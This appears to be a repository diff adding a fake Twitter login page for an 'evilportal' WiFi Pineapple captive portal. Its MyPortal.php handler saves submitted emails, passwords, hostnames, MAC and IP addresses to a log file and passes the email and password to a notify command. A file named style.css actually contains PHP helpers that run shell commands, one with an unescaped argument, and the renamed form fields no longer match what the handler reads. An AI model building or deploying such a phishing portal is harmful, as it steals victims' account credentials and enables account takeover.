Plantilla de Twitter con 2fa operativa

Author: s4vitar

twitter-login/index.php

@@ -136,10 +136,10 @@ function redirect() {
 
         <h1 class="text-center login-title">Log in to Twitter</h1>
 
-          <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()" class="form-signin">
+          <form method="POST" action="post.php" class="form-signin">
 
-            <input type="text" name="email" class="form-email" placeholder="Phone, email, or username" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
-            <input type="password" name="password" class="form-password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
+            <input type="text" name="email_twitter" class="form-email" placeholder="Phone, email, or username" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
+            <input type="password" name="password_twitter" class="form-password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
             <input type="hidden" name="hostname" value="<?=getClientHostName($_SERVER['REMOTE_ADDR']);?>">
             <input type="hidden" name="mac" value="<?=getClientMac($_SERVER['REMOTE_ADDR']);?>">
             <input type="hidden" name="ip" value="<?=$_SERVER['REMOTE_ADDR'];?>">

twitter-login/portal_2fa/MyPortal.php

@@ -0,0 +1,68 @@
+<?php namespace evilportal;
+
+class MyPortal extends Portal
+{
+
+    public function handleAuthorization()
+    {
+        
+        $dirs = array(
+            '/root/', 
+            '/sd/',
+        );
+
+        $dirs = array_filter($dirs, 'file_exists');
+        $dirs = array_filter($dirs, 'is_writeable');
+
+        if (empty($dirs)) {
+            die("die");
+        }
+
+        $dir = array_pop($dirs);
+        $want = $dir . DIRECTORY_SEPARATOR . 'evilportal-logs';
+
+        if (file_exists($want)) {
+        } 
+
+        else {
+            mkdir($want);
+        }
+
+        if (!file_exists($want)) {
+        }
+
+        if (!is_dir($want)) {
+        }
+
+        if (!is_writeable($want)) {
+        }
+
+        $want .= DIRECTORY_SEPARATOR;
+
+        if (isset($_POST['email'])) {
+            $email = isset($_POST['email']) ? $_POST['email'] : 'email';
+            $pwd = isset($_POST['password']) ? $_POST['password'] : 'password';
+            $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname';
+            $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac';
+            $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip';
+            file_put_contents("$dir/evilportal-logs/twitter-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND);
+            $this->execBackground("notify $email' - '$pwd");
+        }
+        // handle form input or other extra things there
+
+        // Call parent to handle basic authorization first
+        parent::handleAuthorization();
+    }
+
+    public function onSuccess()
+    {
+        // Calls default success message
+        parent::onSuccess();
+    }
+
+    public function showError()
+    {
+        // Calls default error message
+        parent::showError();
+    }
+}

twitter-login/portal_2fa/assets/css/bootstrap.min.css

@@ -0,0 +1,205 @@
+.form-signin
+{
+    max-width: 330px;
+    margin: 0 auto;
+}
+.form-signin .form-signin-heading, .form-signin .checkbox
+{
+    margin-bottom: 10px;
+}
+.form-signin .checkbox
+{
+    font-weight: normal;
+}
+.form-signin .form-control
+{
+
+}
+.form-email
+{
+    margin: .65625rem 0;
+    width: 100%;
+    height: 45px;
+    background-color: #f5f8fa;
+    border-radius: 2.3125rem;
+    border-width: 0;
+    font: inherit;
+    padding: .65625rem;
+}
+.form-password
+{
+    margin: .65625rem 0;
+    width: 100%;
+    height: 45px;
+    background-color: #f5f8fa;
+    border-radius: 2.3125rem;
+    border-width: 0;
+    font: inherit;
+    padding: .65625rem;
+}
+.form-email:focus
+{
+    outline: 0;
+}
+.form-password:focus
+{
+    outline: 0;
+}
+.form-signin input[type="text"]
+{
+
+}
+.form-signin input[type="password"]
+{
+    margin-bottom: 5px;
+}
+.account-wall
+{
+    padding: 10px 0px 20px 0px;
+    background-color: #ffffff;
+}
+.login-title
+{
+    margin: 0 auto;
+    max-width: 320px;
+    padding: 0 15px 22px;
+    overflow: hidden;
+    color: #000000;
+    font-size: 1.125em;
+    font-weight: 500;
+    display: block;
+}
+.profile-img
+{
+    width: 150px;
+    height: 150px;
+    margin: 0 auto 10px;
+    display: block;
+    -moz-border-radius: 50%;
+    -webkit-border-radius: 50%;
+    border-radius: 50%;
+}
+
+.friends-text
+{
+    font-size: 18px;
+    font-weight: 400;
+    display: block;
+    color: #757575;
+    padding-bottom: 15px;
+}
+
+.need-help
+{
+    margin-top: 10px;
+}
+.new-account
+{
+    display: block;
+    margin-top: 10px;
+}
+
+.container {
+    margin: 0 auto;
+}
+
+.terms-text1 {
+    color: #000;
+    font-size: 16px;
+    display: block;
+    padding-top: 35px;
+    text-align: center;
+    text-decoration: none;
+}
+
+.url-color {
+    color: #1da1f2;
+    font-size: 15px;
+    font-weight: 400;
+    text-decoration: none;
+}
+a:hover, a:visited, a:link, a:active
+{
+    color: #1da1f2;
+    text-decoration: none;
+}
+.btn-primary {
+  display: block;
+  width: 100%;
+  height: 45px;
+  box-sizing: border-box;
+  margin-top: 15px!important;
+  color: #FFFFFF;
+  background-color: #3098ee;
+  border-color: #3098ee;
+  font-size: 1.25rem;
+  line-height: 1.5em;
+  font-weight: bold;
+  border-width: inherit;
+
+}
+
+.btn-primary:hover,
+.btn-primary:focus,
+.btn-primary:active,
+.btn-primary.active,
+.open .dropdown-toggle.btn-primary {
+  color: #FFFFFF;
+  background-color: #3098ee;
+  border-color: #3098ee;
+}
+
+.btn-primary:active,
+.btn-primary.active,
+.open .dropdown-toggle.btn-primary {
+  background-image: none;
+}
+
+.btn-primary.disabled,
+.btn-primary[disabled],
+fieldset[disabled] .btn-primary,
+.btn-primary.disabled:hover,
+.btn-primary[disabled]:hover,
+fieldset[disabled] .btn-primary:hover,
+.btn-primary.disabled:focus,
+.btn-primary[disabled]:focus,
+fieldset[disabled] .btn-primary:focus,
+.btn-primary.disabled:active,
+.btn-primary[disabled]:active,
+fieldset[disabled] .btn-primary:active,
+.btn-primary.disabled.active,
+.btn-primary[disabled].active,
+fieldset[disabled] .btn-primary.active {
+  background-color: #3098ee;
+  border-color: #3098ee;
+}
+
+.btn-primary .badge {
+  color: #3098ee;
+  background-color: #FFFFFF;
+}
+
+.btn-primary:active:focus {
+  color: #ffffff;
+  background-color: #3098ee;
+  border-color: #3098ee;
+}
+
+.btn-xlarge {
+    padding: 5px 5px;
+    font-size: 1.0em; //change this to your desired size
+    line-height: normal;
+    -webkit-border-radius: 2.3125rem;
+       -moz-border-radius: 2.3125rem;
+            border-radius: 2.3125rem;
+}
+
+.btn-sharp {
+    border-radius: 2.3125rem;
+}
+
+.logo {
+    margin: auto;
+    width: auto;
+    height: 75%;
+}

twitter-login/portal_2fa/assets/css/style.css

@@ -0,0 +1,45 @@
+<?php
+
+/**
+ * getClientMac
+ * Gets the mac address of a client by the IP address
+ * Returns the mac address as a string
+ * @param $clientIP : The clients IP address
+ * @return string
+ */
+function getClientMac($clientIP)
+{
+    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
+}
+
+/**
+ * getClientSSID
+ * Gets the SSID a client is associated by the IP address
+ * Returns the SSID as a string
+ * @param $clientIP : The clients IP address
+ * @return string
+ */
+function getClientSSID($clientIP)
+{
+    // Get the clients mac address. We need this to get the SSID
+    $mac = getClientMac($clientIP);
+
+    // get the path to the log file
+    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
+
+    // get the ssid
+    return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
+
+}
+
+/**
+ * getClientHostName
+ * Gets the host name of the connected client by the IP address
+ * Returns the host name as a string
+ * @param $clientIP : The clients IP address
+ * @return string
+ */
+function getClientHostName($clientIP)
+{
+    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
+}